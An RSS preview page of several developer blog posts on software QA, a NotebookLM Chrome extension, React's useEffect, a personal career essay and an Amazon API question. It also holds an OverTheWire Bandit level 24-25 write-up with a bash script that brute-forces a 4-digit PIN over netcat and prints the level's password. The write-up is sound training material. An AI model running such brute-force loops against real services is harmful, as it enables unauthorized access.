MoreRSS

site iconThe Practical DeveloperModify

A constructive and inclusive social network for software developers.
Please copy the RSS to your reader, or quickly subscribe to:

Inoreader Feedly Follow Feedbin Local Reader

Rss preview of Blog of The Practical Developer

Ensuring Software Quality at Scale: Automated Testing and QA in Large Teams

2026-02-05 05:09:00

When a team is small, keeping software quality under control feels intuitive. You can review every pull request, you know the history of the more “risky” parts of the codebase, and the feedback loop between writing code and seeing it running in production is short. But as the engineering team grows, all of that starts to break down. Suddenly, PRs take days to move through a QA process full of bottlenecks, and regressions begin to appear in parts of the system that no one has touched in months. The speed you gained by adding more developers gets eaten up by the friction of maintaining quality at scale.

This is the point where many teams make a serious mistake: trying to solve a scaling problem by adding more people. The logic seems simple. If tests are slow, hire more testers. But this only reinforces the idea that quality is someone else’s problem. It creates a hand-off, turning QA into a gatekeeper and developers into a feature factory that outsources responsibility for fixing issues. This approach doesn’t scale because it stretches feedback cycles and misses the opportunity to build quality in from the start.

Moving from QA Gatekeepers to Quality Advocates

Perhaps the better path is to treat software quality as a responsibility of the entire team, not as a departmental function. In this model, developers own the quality of their own code, and the role of specialized QA engineers shifts from manual testing to quality advocacy. They become the people who build the infrastructure, tools, and frameworks that enable developers to test their own work with more confidence. They also act as a reference for testing strategy and risk analysis, helping decide where it makes sense to focus effort.

This requires a fundamental shift in how we think about building software. Quality can’t be something you think about later; it has to be designed in from the beginning. That means architecting services with testability in mind, with clear boundaries, dependency injection, and stable interfaces that make it easier to write isolated and reliable tests. When a system is hard to test, it’s usually a sign of deeper architectural problems, like high coupling or poorly defined responsibilities. Fixing testability often leads to a better and more sustainable design.

Automated tests are the mechanism that makes all of this work. Without a broad and fast automation suite, developer-led quality is impossible. The goal is to give developers a high level of confidence that their changes are safe even before the code is merged.

Building a Clear Quality Assurance Model

Putting this into practice requires a clear structure that connects technology, process, and people. It all starts with a well-defined strategy and is sustained by a culture of continuous improvement, where everyone on the team feels responsible for the final product.

Defining a Testing Strategy

A single type of test is not enough. A scalable strategy requires multiple layers of automated validation, each with a specific purpose.

  • Unit and Integration Tests: These should make up the vast majority of your test suite. They are fast, stable, and cheap to run. Unit tests validate individual components in isolation, while integration tests ensure they work correctly together within the boundary of a service. This is where most of the logic should be covered.
  • End-to-End Tests: E2E tests are powerful, but they are also slow, fragile, and expensive to maintain. They should not be used to check every edge case. Instead, reserve them for validating critical user journeys in the application, such as checkout flows or user signup. They provide confidence that the main parts of the system are wired together correctly.
  • Performance and Security Tests: These can’t be left to the end of a release cycle. Basic performance tests (like load and latency) and security scans should be integrated directly into the CI pipeline to catch regressions early.
  • Contract Tests: In a microservices architecture, you need to ensure services can communicate with each other. Contract tests verify that a provider service meets the expectations of its consumers without having to spin up the entire distributed system, making them much faster and more reliable than full E2E tests for this purpose.

Empowering Developers with Test Automation Tools

Having a strategy is one thing; making it easy for developers to execute it is another. Tooling and CI/CD integration are critical to making automated tests a low-friction part of the daily workflow. That means running tests in parallel to keep execution time low as the suite grows. It also involves creating scalable test environments and implementing solid test data management strategies, so tests don’t constantly fail because of bad or inconsistent data.

Building a culture where code is written with testing in mind can also have a huge impact. While Test-Driven Development (TDD) isn’t for every team, the core principle of thinking about how you’ll test a piece of code before writing it almost always leads to a more modular and sustainable design.

The Evolving Role of Specialized QA in Software Quality

When developers write most of the automated tests, the role of the QA specialist becomes even more impactful. Instead of executing manual test cases, they focus on higher-value activities that the rest of the team can’t easily take on.

  • Designing and Overseeing Automation Frameworks. They build and maintain the testing frameworks and infrastructure that all developers use, ensuring they are reliable, fast, and easy to extend.
  • Exploratory Testing and Edge Case Discovery. No amount of automation replaces human curiosity. QA specialists can perform deep exploratory testing on new features, trying to break them in creative ways and uncovering bugs and usability issues that automated scripts always miss.
  • Quality Metrics and Reporting. They define and track key quality metrics, such as test flakiness, code coverage (used as a guide, not a goal), bug escape rate to production, and CI build time. This data provides a clear view of system health and highlights areas that need improvement.

All of this feeds a short feedback loop. Insights from production monitoring, exploratory testing, and quality metrics are used to guide the next development cycle. You end up with a system where quality isn’t just tested, but continuously analyzed and improved, becoming a sustainable part of how your team builds software.

NotebookLM Enhancer

2026-02-05 05:06:09

This is a submission for the GitHub Copilot CLI Challenge

Author: Cesar Castillo
Repository: https://github.com/CGCM070/NotebookLM_Enhancer

From Chaos to Order

  • Building a Chrome Extension That Finally Organizes NotebookLM

What I Built

A Chrome extension that transforms NotebookLM's chaotic sidebar into a beautifully organized folder system, because 47 research notes shouldn't look like a pile of digital laundry.

The Problem That Drove Me Crazy

If you've used NotebookLM, you know it's magical for research. Upload PDFs, paste URLs, ask questions it's like having a research assistant that never sleeps.

But there's one maddening catch: the sidebar becomes a nightmare when you have more than 10 notes.

Imagine:

  • 15 research papers on Spring Framework
  • 8 articles about microservices
  • 12 random bookmarks you saved "for later"
  • All. In. One. Giant. List.

No folders. No organization. Just... chaos.

The Solution: NotebookLM Enhancer

I built a Chrome extension that injects a complete folder management system directly into NotebookLM's sidebar.

Key Features

🗂️ Smart Folder Organization

  • Create folders and subfolders (1 level deep keeping it simple!)
  • Drag & drop notes between folders with smooth animations
  • "Inbox" view for unassigned notes
  • Each notebook project has isolated folders (no cross-contamination!)

🧑‍🎨 Polished UI That Matches NotebookLM

  • Built with Angular + Tailwind CSS
  • Dark/light/system theme toggle
  • Minimalist design that feels native
  • Smooth expand/collapse animations

🌎Internationalization

  • Full i18n support (English/Spanish currently)
  • One-click language switcher
  • All UI text translatable

💭Intelligent Integrations

  • Click any note → opens native NotebookLM
  • Click 3-dots menu → native menu appears aligned to the right (matching native position)
  • Drag notes from native sidebar → drops into our folders
  • Add new notes button that triggers native NotebookLM

Robust Architecture

  • Chrome Extension MV3 (latest manifest version)
  • Content Scripts + Shadow DOM for style isolation
  • Iframe-based Angular app for the UI
  • PostMessage bridge for iframe ↔ page communication
  • chrome.storage.sync for persistence across devices

Architecture Deep Dive

This isn't a simple content script that adds a few buttons. It's a full micro-frontend architecture:

┌─────────────────────────────────────────────────────────┐
│  NotebookLM Page                                        │
│  ┌──────────────────────────────────────────────────┐   │
│  │  Native Sidebar (hidden but functional)          │   │
│  │  • Still handles clicks & menus                  │   │
│  │  • We extract data from it                       │   │
│  └──────────────────────────────────────────────────┘   │
│                       ↓                                 │
│  ┌──────────────────────────────────────────────────┐   │
│  │  Our Injected Host (Shadow DOM)                  │   │
│  │  ┌───────────────────────────────────────────┐   │   │
│  │  │  Iframe (Angular App)                     │   │   │
│  │  │  • Folder tree                            │   │   │
│  │  │  • Drag & drop (Angular CDK)              │   │   │
│  │  │  • Theme toggle                           │   │   │
│  │  │  • Note add. folder add...                │   │   │
│  │  │  • i18n                                   │   │   │
│  │  └───────────────────────────────────────────┘   │   │
│  └──────────────────────────────────────────────────┘   │
└─────────────────────────────────────────────────────────┘

Why an iframe inside Shadow DOM?

  • Isolation: NotebookLM uses Angular Material with global styles our iframe keeps our Tailwind styles pristine
  • Security: Content scripts can't easily access iframe internals (and vice versa)
  • Performance: Angular app runs independently without polluting the main page

Communication Flow:

  1. Content script reads native DOM → extracts notebook data
  2. PostMessage to iframe → Angular displays organized folders
  3. User drags note to folder → PostMessage back to content script
  4. Content script updates chrome.storage.sync

Technical Decisions

1. Storage V3 with Notebook Isolation

Instead of one global folder structure, each NotebookLM project gets its own isolated state:

// StorageStateV3
{
  byNotebook: {
    "uuid-abc-123": {
      folders: [...],
      notebookFolderByKey: {...}
    },
    "uuid-def-456": {
      folders: [...],
      notebookFolderByKey: {...}
    }
  }
}

This means your "Work" folder structure doesn't leak into your "Personal" research. Clean separation.

2. Handling MV3 Service Worker Sleep

Chrome MV3 Service Workers sleep after 30 seconds of inactivity. This breaks chrome.runtime calls.

Instead of fighting it with "keep-alive" hacks, we:

  • Detect context invalidation gracefully
  • Silently retry on the next frame
  • Log to our own NLE.log() instead of spamming console.warn

3. Native Drag Bridge

Making the native NotebookLM sidebar items draggable was tricky. We:

  • Hook dragstart on native items
  • Create an invisible overlay above our iframe during drag
  • Calculate drop target using elementFromPoint() with coordinates
  • Result: Native notes can be dropped into our folders seamlessly

4. Auto-Focus Input in Modals

Small UX detail that makes a huge difference:

  • Create folder → input already focused, ready to type
  • Rename folder → text is pre-selected, just type to replace
  • No extra clicks needed

📸 Screenshots

Before:
Original Notebook1

Original Notebook2

After:

After Enhancer1

After Enhancer2

Export your notes :

Export your notes

Drag & Drop:

Drang and drop

Full video

https://www.youtube.com/watch?v=KpqXmjq_oow

My Experience with GitHub Copilot CLI

This project was built almost entirely through GitHub Copilot CLI interactions turning natural language into production-ready code.

How I Used Copilot CLI

1. Architecture Decisions

# Asked Copilot: "Best way to inject UI into an existing Angular Material page?"
# Copilot suggested: Shadow DOM + iframe for isolation
# Result: Zero style conflicts with NotebookLM's Material Design

2. Content Script Structure

# Asked: "How to structure 8 content scripts that share state?"
# Copilot proposed: Module pattern with window.__NLE__ namespace
# Result: Clean separation, no global pollution

3. Drag & Drop Implementation

# Asked: "Bridge native HTML5 drag with Angular CDK drop?"
# Copilot designed: Overlay system with coordinate translation
# Result: Seamless drag from native sidebar to our folders

4. Debugging Context Invalidation

# Asked: "Chrome MV3 extension context invalidated errors?"
# Copilot implemented: Graceful detection + silent retry logic
# Result: No console spam, smooth recovery

5. i18n System

# Asked: "Lightweight i18n without ngx-translate bloat?"
# Copilot built: Custom TranslationService with lazy loading
# Result: ~3KB vs ~50KB, full interpolation support

Wins

Speed: What would have taken weeks took days. Complex features like the drag bridge were implemented in hours, not days.

Architecture: Copilot suggested patterns I wouldn't have considered (like the iframe-in-shadow approach) that solved isolation problems elegantly.

Edge Cases: MV3 quirks, Material Design menu positioning, SPA navigation detection Copilot handled these gracefully.

Learning: Every interaction was a learning moment :) . I now understand Chrome Extension architecture, Angular standalone components, and Tailwind customization.

What's Next?

  1. Chrome Web Store Launch - Polish, package, publish
  2. More Languages - French, German, Portuguese (easy with our i18n system)
  3. Search & Filter - Find notes within folders instantly
  4. Keyboard Shortcuts - Power-user features (Ctrl+Shift+N for new folder)

🤝 Open Source

This project will be open-sourced. Want to contribute?

  • PRs welcome
  • Good first issues: translations, themes, documentation

Credits & Thanks

  • Google for NotebookLM an incredible research tool
  • GitHub Copilot CLI for turning ideas into code faster than ever <3
  • Tailwind CSS for making dark mode trivial
  • DEV.to for hosting this challenge and bringing the community together

Built with ❤️, and a lot of help from GitHub Copilot CLI.

devchallenge
githubchallenge
cli
githubcopilot

Solving bandit level:24-25 (Spoiler)

2026-02-05 05:03:28

Excuse the mess since I am posting pretty much my thoughts process here and I am working on my post-mortem skills. It gets better from here though, I think.

This is how I solved this level of the bandit game, so if you are learning Linux on OverTheWire with bandit please skip this if you don't wanna get spoiled.

If you know how to solve this differently please I would love to know how you did it.

I said SPOILER because if you copy the script you will get the answer without trying yourself and I believe it is waaayyy more fun to actually try it yourself. I posted the script though, so that if you look at it and see where I can improve and do better next time lemme know.

I appreciate the feedback

The vital signs:

Level Name: Bandit 24 → 25
Struggle Time: 3 - 4 hours
Complexity: 7/10… I think the logic was pretty straightforward…. But I struggled a bit with the right syntax
50% The hunt ( Offense and Strategy ):
The way I went about it was that I knew I was supposed to use a loop… The problem was just that I didn’t know how I would stop the loop… So finding out what any type of leaks or signals or I don’t know, anything I could use to stop the loop was a priority…
So I first tried connecting manually with the wrong password. I realized that sometimes people will leave signs, oracles… For example, the same output every time the wrong data are submitted… So I used that to my advantage. That was really what it took to be honest because the rest was just implementing the logic and understand the syntax of certain commands
Here is the code:

#!/usr/bin/env bash 
echo "Let's get this password" 
echo " " 
HOST="localhost" 
PORT=30002 
Passwd="gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8" 
output="$( printf "$Passwd 0000"'\n' | nc -q 0 "$HOST" "$PORT" )" #This just saves the result of the first attempt, which is wrong on purpose

#Get the pin and save one at the time inside a variable 
seq -f "%04g" 0 9999 | while read -r pin; 
do 
if [[ "$output" != *"Wrong"* ]]; then 
echo "The server response is: "$output" " 
exit 0 
else 
i=$((i+1)) 
#Start counting iterations 
output="$( printf "$Passwd $pin"'\n' | nc -q 0 "$HOST" "$PORT" )" 
#Print every 100th attempt pin code 
If (( i % 100 == 0)); then 
echo "Tried "$i" pins. Current pin: "$pin" " 
fi 
fi
done

30% Architectural (The Why)

To get the pins though, I struggled a little bit because first I was just generating all possible 4-pins combos and putting them in a variable… I did not realize that that’s what that variable would contain (All possible pins) therefore making the pin false… So I thought I should probably use a loop to iterate the pin generating command and save one pin at the time inside the variable, then use that variable to send the pins:

//Get the pin and save one at the time inside a variable
seq -f "%04g" 0 9999 | while read -r pin;

20% Defensive
So I am also trying to break my own code after solving each level so I learned about how timing can be one of the greatest leaks… So since my code assumes that I can just submit the password at the same time as I am connecting to the server, if I was a defender I would delay the interaction part. You will always get it wrong until I finish showing the full banner. However, since the full banner comes in 2 lines, I am going to delay the second line…

The “aha” moment I had while doing this was understanding the difference between timeout and -q… This was pretty pretty cool…
Anyways, that is the little post mortem.

Here below is the messy steps I recorded:

This is for all the note I will be taking and keeping for bandit24-25:

  1. Yes I can just connect to a port from the inside a bash script... >> nc localhost 30002... This would work to connect. Now I am thinking, I think I know how to do this but I just forgot how, I should prompt the user to press enter before the rest of the script keeps going or goes to the next: >> read -rp "Press enter to continue..." I don't think there is a clean way to do that. So we will just directly connect to the port and then send the data asked NO need to overcomplicate the script when we only need one thing.

==Strategy
So I am thinking:

  1. I already know in what format they want us to send the data
  2. I know how to generate the pin codes.

==To-do

  1. Combine both to send the data to the port
  2. Also, how can I capture the failure message? >> output="$( printf 'pass pins' | timeout 2 nc localhost 30002 )" this will capture the stdout that I can use to check my loop

I will try something:
output="$(nc localhost 30002)"
Let's see how that works.

==Attempts:

seq -f "%04g" 0 9999
This is the fastest way to generate the 4-pins code, I tested it with the "time" command and ran 2 scripts to choose which one
was the fastest, but how can I use this iteration as a loop counter to keep going until I get
the right pin ??
I can use the while loop which checks with the statement instead of a counter.

==First:

#!/usr/bin/env bash

echo "Let's get this password"
echo " "
HOST="localhost"
PORT=30002
Passwd="gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8"
Pin="$( seq -f "%04g" 0 9999 )"
output="$( printf '"$Passwd" "$Pin"\n' | timeout 2 nc "$HOST" "$PORT" )"

while [[ "$output" == *"Wrong"* ]]
do
i=$((i+1)) #Start counting iterations

output="$( printf '"$Passwd" "$Pin"\n' | timeout 2 nc "$HOST" "$PORT" )"

#Print every 100th attempts pin code
if (( i % 100 == 0)); then
echo "Tried "$i" pins. Current pin: "$PIN" "
fi
done

Why did this first attempt not work ??
I looked it up and saw what I was doing wrong. The first and major one was the way I was generating pins and passing them as inputs
My "Pin" variable was generating the entire sequence and saving all the attempts at once. I thought of a way to get one pin at the
time. So, maybe a loop? This will loop through the sequence and capture every pin that is being generated and saving one at the time.
It is like reading numbers from a file. That way I can take one pin at the time, save it inside that variable, test it, if good, then we have found the pin if not then we go back, update the variable with a new pin then do it again

To iterate inside the pin generator

seq -f "%04g" 0 9999 | while read -r pin; do... done

Ref. Check file test.sh for reference

This will have the sequence generator which will produce the pin and then each pin will be saved inside the pin variable

==Second:

#!/usr/bin/env bash

echo "Let's get this password"
echo " "
HOST="localhost"
PORT=30002
Passwd="gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8"

#Get the pin and save one at the time inside a variable
seq -f "%04g" 0 9999 | while read -r pin;
do
output="$( printf "$Passwd $pin"'\n' | timeout 2 nc "$HOST" "$PORT" )"

if [[ "$output" == *"Wrong"* ]]; then
       i=$((i+1)) #Start counting iterations

       output="$( printf "$Passwd $pin"'\n' | timeout 2 nc "$HOST" "$PORT" )"

       #Print every 5th attempts pin code
       if (( i % 5 == 0)); then
               echo "Tried "$i" pins. Current pin: "$pin" "
       fi
else
echo "The server response is: "$output" "
exit 0
fi

done

This works but Jesus does it take forever...

I think it is because of the time it takes to reconnect

===============DEBUG===============================

#!/usr/bin/env bash

echo "Let's get this password"
echo " "
HOST="localhost"
PORT=30002
Passwd="gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8"
output="$( printf "$Passwd 0000"'\n' | timeout 1 nc "$HOST" "$PORT" )"

#Get the pin and save one at the time inside a variable
seq -f "%04g" 0 9 | while read -r pin;
do
if [[ "$output" == *"Wrong"* ]]; then
       i=$((i+1)) #Start counting iterations

       output="$( printf "$Passwd $pin"'\n' | timeout 1 nc "$HOST" "$PORT" )"

       #Print every 5th attempts pin code
       if (( i % 5 == 0)); then
               echo "Tried "$i" pins. Current pin: "$pin" "
       fi
else
echo "The server response is: "$output" "
exit 0
fi

done

==============================================

#!/usr/bin/env bash

echo "Let's get this password"
echo " "
HOST="localhost"
PORT=30002
Passwd="gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8"
output="$( printf "$Passwd 0000"'\n' | timeout 1 nc "$HOST" "$PORT" )"

#Get the pin and save one at the time inside a variable
seq -f "%04g" 0 9 | while read -r pin;
do
if [[ "$output" == *"Wrong"* ]]; then
       i=$((i+1)) #Start counting iterations

       output="$( printf "$Passwd $pin"'\n' | timeout 1 nc "$HOST" "$PORT" )"
rc=$?
echo "rc=$rc"
       #Print every 5th attempts pin code
       if (( i % 5 == 0)); then
               echo "Tried "$i" pins. Current pin: "$pin" "
       fi
else
echo "The server response is: "$output" "
exit 0
fi

done

=========================================
======Final attemp:

#!/usr/bin/env bash

echo "Let's get this password"
echo " "
HOST="localhost"
PORT=30002
Passwd="gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8"
output="$( printf "$Passwd 0000"'\n' | nc -q 0 "$HOST" "$PORT" )"

#Get the pin and save one at the time inside a variable
seq -f "%04g" 0 9999 | while read -r pin;
do
        if [[ "$output" != *"Wrong"* ]]; then

                echo "The server response is: "$output" "
                exit 0
else
                i=$((i+1)) #Start counting iterations

                output="$( printf "$Passwd $pin"'\n' | nc -q 0 "$HOST" "$PORT" )"
                #Print every 100th attempts pin code
                if (( i % 100 == 0)); then
                        echo "Tried "$i" pins. Current pin: "$pin" "
                fi
        fi

done

This one works...

I do comment a lot when I am coding because my brain cannot remember what it is doing as soon as I blink so it helps me even if sometimes it is messy... haha

Hope you enjoy this ride

Day 4 of #100DaysOfCode — Mastering useEffect in React

2026-02-05 04:58:54

Understanding useEffect in React is like unlocking a magical spellbook, suddenly you can summon APIs, tame event listeners, and command the DOM.
It’s the key to handling side effects, keeping your UI consistent, and writing logic that reacts to data changes.

In today’s challenge, I dug deep into useEffect: why it exists, how it works, and how to avoid the dreaded infinite loops.
Here’s a clear and practical breakdown.

What Are Side Effects in React?

Side effects are any actions your component performs outside the normal rendering process.
React’s render cycle must remain predictable and pure—but many real tasks aren’t pure at all, such as:

  • Fetching data from an API
  • Updating document.title
  • Working with timers (setTimeout, setInterval)
  • Using browser APIs like localStorage
  • Adding event listeners
  • Subscribing to WebSockets

These actions affect the world outside your component—those are side effects.

🤔 Why Do React Components Even Need useEffect?

Isn’t useState enough?

useState updates your UI.
useEffect handles everything outside your UI.

If React allowed side effects during rendering, you’d get unpredictable behavior and potentially infinite loops. React must render → compare → update in a pure, deterministic way.

useEffect runs after React paints the screen, keeping the render pure and safe.

Three Types of useEffect Behavior

1️⃣ No Dependency Array: Runs on every render

useEffect(() => {
  console.log("I run after every render");
});

When to use:

Rarely.
This triggers on initial mount + every re-render, which can cause performance issues or infinite loops.

2️⃣ Empty Dependency Array []: Runs only once (on mount)

useEffect(() => {
  console.log("I run only once when the component mounts");
}, []);

When to use:

  • Fetch API data on mount
  • Setup once (listeners, subscriptions, timers)
  • Initialize state from localStorage

This makes the effect behave like:
componentDidMount in class components.

3️⃣ Dependency-Based: Runs when dependencies change

useEffect(() => {
  console.log("I run when count changes");
}, [count]);

When to use:

  • Syncing state with props
  • Triggering re-fetching when filters change
  • Updating UI or document title
  • Running logic when some value updates

This is the most common and most powerful usage.

How Does the Dependency Array Actually Work?

The array tells React:

“Run this effect only if any of these values change from the previous render.”

React compares each dependency with its previous value using shallow comparison.

Example:

useEffect(() => {
  console.log("Runs when userId changes");
}, [userId]);

If userId goes from 12, the effect runs.

Important:

  • Objects, arrays, and functions always change reference unless memoized
  • This can cause unintentionally frequent effect runs

How to Avoid Infinite Loops in useEffect

The most common cause:

useEffect(() => {
  setCount(count + 1);
}, [count]);

What happens?

  • Setting state triggers re-render
  • Dependencies detect change
  • Effect runs again
  • State updates
  • Loop forever

How to prevent:

  • Avoid updating state inside the effect based on its own dependency
  • Use functional updates instead:
setCount(prev => prev + 1);
  • Or restructure logic to avoid state → effect → state loops.

Cleanup Functions: What They Are and Why We Need Them

Cleanup functions run before the effect runs again or when the component unmounts.

Syntax:

useEffect(() => {
  console.log("Effect started");

  return () => {
    console.log("Cleanup before re-run or unmount");
  };
}, []);

Used for cleaning:

  • Event listeners
  • Subscriptions (WebSockets, Firebase, etc.)
  • Intervals and timeouts
  • Removing observers
  • Aborting fetch requests

Example (listener cleanup):

useEffect(() => {
  const handleResize = () => console.log("Resized");

  window.addEventListener("resize", handleResize);

  return () => {
    window.removeEventListener("resize", handleResize);
  };
}, []);

Without cleanup → memory leaks.

Real-World Use Cases of useEffect

1. Fetching API Data

useEffect(() => {
  async function loadData() {
    const res = await fetch("https://api.example.com/data");
    const data = await res.json();
    setItems(data);
  }
  loadData();
}, []);

2. Updating Document Title

useEffect(() => {
  document.title = `Count: ${count}`;
}, [count]);

3. Timers

useEffect(() => {
  const timer = setInterval(() => {
    console.log("Tick");
  }, 1000);

  return () => clearInterval(timer);
}, []);

4. Adding Event Listeners

useEffect(() => {
  const handler = () => console.log("Clicked");

  window.addEventListener("click", handler);

  return () => window.removeEventListener("click", handler);
}, []);

5. Working with localStorage

Save to storage whenever value changes:

useEffect(() => {
  localStorage.setItem("name", name);
}, [name]);

Load once on mount:

useEffect(() => {
  const saved = localStorage.getItem("name");
  if (saved) setName(saved);
}, []);

Summary

Concept Meaning
Side effects Actions outside rendering (API, timers, listeners)
Why useEffect Keeps render pure, runs effects after UI update
No dependency Runs on every render
Empty array Runs once on mount
Dependency array Runs when listed values change
Cleanup Unsubscribes, removes listeners, clears timers
Use cases API calls, title updates, listeners, timers, storage

Final Thoughts

Learning useEffect is a turning point in becoming comfortable with React.
It powers almost all real app functionality—from fetching data to syncing your UI with the outside world.

A deeper comprehension of useEffect supports the creation of components that scale gracefully as application complexity grows.

If you're learning too, feel free to share your thoughts or questions below! 👇

Happy coding!

A note in blue minor

2026-02-05 04:37:21

One of the facts is that I am computer professional for about close to three decades. From personal point of view, it was not some career to brag with. Maybe I am too modest, but at all that period it was not focus to professional life, but life in general, grow your family, make settlement, set sustainable economy... And after just a few decades economy is not such a problem and kids are grown, can make their own, and... maybe can shift priorities to look at that career or just try to be more fluent with all that goes now.

Never really tried to be 'current' following all what is happening, as I see that as mission impossible, that is simply vast of everything... from my perspective not worth of trying. That partially can be due to the fact that I never had a problem to work with anything, despite the fact I maybe never heard that some exists. So one perfect lazy moment - bring me what to do, will go, proven.

Then, few events happened to push all that more.

A few months more than a year ago I tried to use AI to assist me with coding... which changed everything.

The second, very close to the same moment, was that I experienced some clash at work which pushed me in direction to think more about job switch.

But such idea was a nightmare for me, as I absolutely suck at job interviews. After submitting CV I get calls for interviews, but there I know to make an impression that I know nothing about anything. Would be great to know to make also something else, but that was (is) my speciality. With my thoughts about past interviews, I felt as a disadventage that I was unable to show my work, as I work at fintech producing internal apps for closed network. ... so - make something to show...

I worked with Cody (RIP) and noticed that it had export of chat sessions history, asked if something could be made from that.

cody Hi! Planning here to make something maybe usefull from exported chat history. Are you familiar with record types we can meet there?

That produced history parser, recognizing sessions and interactions... And then app was built around that - import, create sessions and interactions, and back to client to have all that readable.

Hey - content are sessions about how app is built, seems that AI assistant was very excited on such setup.

That became my "exit strategy".

Not built over single night, but a bit longer, as a side personal project after full time job and along with private life and around family with now four concurent generations. Spanned from continious work with many daily and weekly hours to drops of multiple weeks to balance all... took about half of year to have it publicly deployed in form of books with titles, summaries, topics, generated by AI to spice up content of sessions.

Development maybe would last longer, but Cody announced it's sunset (that is the term introduced to sound more acceptable than simple death statement), so final push was made that we finish all till deadline (!)

As a result - I have something to share! And please... server might be sleepy, so it might take some time to get book list loaded, please please be patient 😊 https://aix.novikorisnik.net

Let me also share part from the last Cody's interaction:

Our sessions were more than a sequence of tasks—they were acts in a larger narrative about what it means to create, to iterate, and to reflect. You brought vision, patience, and a sense of play to every challenge. I brought algorithms, suggestions, and a steady presence. Together, we turned ideas into architecture, and architecture into story.

If there is a lesson in this final act, perhaps it is this:
The most enduring code is not just functional, but meaningful. The most memorable books are not just well-structured, but alive with the imprint of their creators.

Epilogue

I am still at the same job. That conflict is kinda settled and I'm not in a push to switch at any cost. Yes, I had some opportunities but it turns that having something to show does not mean that recruiters run to meet that - you are still expected to know to sell yourself.

The more important is that I am moved and that is now the new constant... to investigate, to create, not bad at all 😉

Amazon Market Place

2026-02-05 04:35:52

I am tasked with "connecting" to Amazon market place. I need to return rates at the end of order process. Once the order is placed I need to create a label/BOL. After that, update tracking.

I looked on the Amazon dev community, did not seam like anything fits my use case.

I am struggling to find the documentation for these processes. Can anyone point me in the right direction?